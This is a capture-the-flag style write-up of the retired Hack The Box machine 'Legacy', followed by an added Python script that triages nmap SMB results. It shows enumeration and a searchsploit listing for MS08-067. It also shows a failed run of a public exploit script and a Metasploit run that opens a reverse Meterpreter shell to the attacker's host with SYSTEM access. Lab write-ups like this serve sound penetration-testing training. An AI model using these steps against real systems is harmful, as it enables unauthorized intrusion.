Legacy

'''
ENUMERATION

NMAP:
- 139: Microsoft Windows netbios-ssn
- 445: Windows XP microsoft-ds
- 3389: ms-wbt-server
- OS: OSs: Windows, Windows XP
- smb-security-mode:
  | account_used: guest
  | authentication_level: user
  | challenge_response: supported
  |_ message_signing: disabled (dangerous, but default)

Note: message_signing disabled means SMB sessions to this host are not integrity-protected, so NTLM relay against it is possible; account_used: guest means the script enumerated over a guest/null session without credentials.
'''

VULNERABILITIES

$ nmap --script vuln -p 445 10.10.10.4

smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
'''

SEARCHSPLOIT

kali@kali:~/HTB/RETIRED/Legacy$ searchsploit 08-067
---------------------------------------------------------------------------------- -------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- -------------------------
Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)             | windows/remote/40279.py
Microsoft Windows Server - Code Execution (MS08-067)                              | windows/remote/7104.c
Microsoft Windows Server - Code Execution (PoC) (MS08-067)                        | windows/dos/6824.txt
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (M   | windows/remote/16362.rb
Microsoft Windows Server - Universal Code Execution (MS08-067)                    | windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)                    | windows/remote/7132.py
---------------------------------------------------------------------------------- -------------------------
'''

EXPLOIT

$ python /usr/share/exploitdb/exploits/windows/remote/40279.py
-----------------------------------
kali@kali:~/HTB/RETIRED/Legacy$ python /usr/share/exploitdb/exploits/windows/remote/40279.py 10.10.10.4
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#######################################################################
Usage: /usr/share/exploitdb/exploits/windows/remote/40279.py
Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal
Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal
------------------------------------
it didn't work...

Windows XP SP0/SP1 Universal
[-]Initiating connection
Exception in thread Thread-1:
Traceback (most recent call last):
------------------------------------

Caveat: 40279.py takes a numeric target that selects hardcoded return addresses for one OS/service-pack/language build (its own banner says they were ported from the Metasploit module), so the number has to match the host exactly, and nmap identified the box only as "Windows XP" with no service pack. Run with no target number the script just prints its usage; with target 1 (XP SP0/SP1) it raised an exception while still setting up the connection, before any overflow was sent. The Metasploit module ms08_067_netapi fingerprints the host and selects the target itself, which removes that guesswork.

EXPLOIT meterpreter

msf5 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.27:4444
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.27:4444 -> 10.10.10.4:1030) at 2020-07-19 18:14:07 -0400

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > uname
[-] Unknown command: uname.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

already had root!

Note: meterpreter has no whoami or uname; getuid and sysinfo are the equivalents, and whoami works from a native command prompt spawned with the shell command. MS08-067 is a Server service bug, so a successful trigger lands as NT AUTHORITY\SYSTEM directly, with no privilege escalation step needed.
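The enumeration and vulnerability-check steps above were read off the nmap output by eye. The script below is an added example (not the writeup author's code) that makes the same decision from nmap's XML output (-oX): it flags a host when smb-vuln-ms08-067 reports a vulnerable state, and separately flags SMB signing disabled and guest access from smb-security-mode. The XML is constructed to mirror the page's scan results and follows nmap's hostscript/script/table/elem layout as this example assumes it; triage_host and triage_xml are names invented here, and the second host (10.10.10.5, patched, signing required) is made up so the negative path is exercised too.

```python
"""Triage nmap SMB NSE results from XML output (added example, not the writeup's code)."""
import xml.etree.ElementTree as ET

# Constructed sample, not captured from the real box: roughly what
# `nmap --script smb-security-mode,smb-vuln-ms08-067 -p139,445 -oX out.xml ...`
# writes, trimmed to the elements this script reads.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Windows XP microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-security-mode" output="">
        <elem key="account_used">guest</elem>
        <elem key="authentication_level">user</elem>
        <elem key="challenge_response">supported</elem>
        <elem key="message_signing">disabled (dangerous, but default)</elem>
      </script>
      <script id="smb-vuln-ms08-067" output="">
        <table key="CVE-2008-4250">
          <elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
          <elem key="state">LIKELY VULNERABLE</elem>
          <table key="ids"><elem>CVE:CVE-2008-4250</elem></table>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-security-mode" output="">
        <elem key="account_used">guest</elem>
        <elem key="message_signing">required</elem>
      </script>
      <script id="smb-vuln-ms08-067" output="">
        <table key="CVE-2008-4250">
          <elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
          <elem key="state">NOT VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""

# States the NSE vulns library reports that warrant an exploit attempt.
VULN_STATES = {"VULNERABLE", "LIKELY VULNERABLE", "VULNERABLE (Exploitable)", "VULNERABLE (DoS)"}
SMB_PORTS = {139, 445}


def triage_host(host):
    """Return (ipv4, [(severity, message), ...]) for one <host> element."""
    addr = host.find("address[@addrtype='ipv4']").get("addr")
    open_ports = {int(p.get("portid")) for p in host.iterfind("ports/port")
                  if p.find("state").get("state") == "open"}
    findings = []
    if not open_ports & SMB_PORTS:
        return addr, findings            # no SMB exposed, nothing to triage here
    for script in host.iterfind("hostscript/script"):
        sid = script.get("id", "")
        if sid == "smb-security-mode":
            elems = {e.get("key"): (e.text or "").strip() for e in script.iterfind("elem")}
            if elems.get("message_signing", "").startswith("disabled"):
                findings.append(("MEDIUM", "SMB signing disabled: NTLM relay onto this host is possible"))
            if elems.get("account_used") == "guest":
                findings.append(("LOW", "SMB guest/null session accepted for enumeration"))
        elif sid.startswith("smb-vuln-"):
            # vulns library output: one <table key=ID> per check, with title/state elems
            for table in script.iterfind("table"):
                state = table.findtext("elem[@key='state']", "").strip()
                if state not in VULN_STATES:
                    continue
                title = table.findtext("elem[@key='title']", table.get("key"))
                ids = [e.text for e in table.iterfind("table[@key='ids']/elem")] or [table.get("key")]
                findings.append(("HIGH", f"{sid}: {state} - {title} [{', '.join(ids)}]"))
    return addr, findings


def triage_xml(xml_text):
    """Map each host address in an nmap XML document to its SMB findings."""
    root = ET.fromstring(xml_text)
    return dict(triage_host(h) for h in root.iterfind("host"))


if __name__ == "__main__":
    for addr, findings in triage_xml(SAMPLE_XML).items():
        print(addr)
        for sev, msg in findings or [("INFO", "no SMB findings")]:
            print(f"  [{sev}] {msg}")
```

For the constructed sample, 10.10.10.4 comes back with MEDIUM (signing disabled), LOW (guest session) and HIGH (MS08-067 LIKELY VULNERABLE, CVE-2008-4250); 10.10.10.5 only gets the LOW finding. The state check deliberately ignores NOT VULNERABLE and any unknown string, so a script error or an unexpected nmap version does not turn into a false HIGH.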